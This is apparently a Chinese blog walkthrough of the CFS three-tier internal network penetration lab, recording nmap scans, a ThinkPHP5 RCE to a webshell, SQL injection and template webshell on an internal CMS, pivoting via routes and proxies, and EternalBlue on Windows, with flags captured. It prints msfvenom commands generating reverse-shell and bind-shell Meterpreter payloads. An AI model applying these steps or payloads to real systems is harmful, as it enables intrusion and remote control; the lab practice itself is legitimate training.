CFS三层内网渗透
2024-09-24 00:00:00 # 内网

CFS三层内网渗透笔记

网络配置

攻击机:192.168.1.129/192.168.2.163

CentOS:192.168.1.128/192.168.2.165/192.168.22.128

Ubuntu:192.168.22.129/192.168.33.128

Windows:192.168.33.33

外网打点

信息收集

1
2
3
4
5
6
7
8
9
10
11
Nmap scan report for 192.168.1.128
Host is up (0.00084s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http nginx
111/tcp open rpcbind 2-4 (RPC #100000)
888/tcp open http nginx
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http Ajenti http control panel

先访问80端口

image-20240904210309724

一个TP5的框架,上工具扫一下

image-20240904210404256

可以看到有5023的RCE,上个webshell

image-20240904210639036

网站目录下flag:flag{e2D3aFdasde},robots.txt里面flag:flag{QeaRqaw12fs}

image-20240904211943542

根目录下flag:flag{qEa12Nasd1a}

现在的权限是www,提权先跳过,后面再补

TODO:提权

centos上线msf

生成木马

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.163 LPORT=4444 -f elf > centos.elf

上线

image-20240923212333358

网段查看并建立路由

image-20240923212828366

设置代理

image-20240923213338880

对22网段信息收集

上传fscan进行内网扫描

image-20240904212845859

可以看到在129主机上开放一个CMS

image-20240904221355945

有一个sql注入的提示

image-20240904222901313

sqlmap一把梭,拿到管理员账号密码

image-20240907155004125

从网站robots文件得到后台地址

image-20240907155253577

admin/123qwe登录后首页flag:flag{eS3sd1IKarw}

image-20240907155455458

修改网站模板,添加一句话木马

image-20240907160407876

Proxifier+哥斯拉上线

image-20240907160508728

flag42Fs.txt文件得到flag:flag{23ASfqwr4t2e}

根目录下flag:flag{1a2saA23eas}

提权暂时跳过

ubuntu上线msf

用msf生成正向木马上线

1
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=2222 -f elf > ubuntu.elf

image-20240923225642691

查看建立路由

image-20240923225909960

对33网段信息收集

1
proxychains nmap -Pn -sT -T4 192.168.33.33

image-20240924002957016

用445端口的永恒之蓝打

当时只想着换正向payload了,忘了换操作系统了……

image-20240924004023855

ok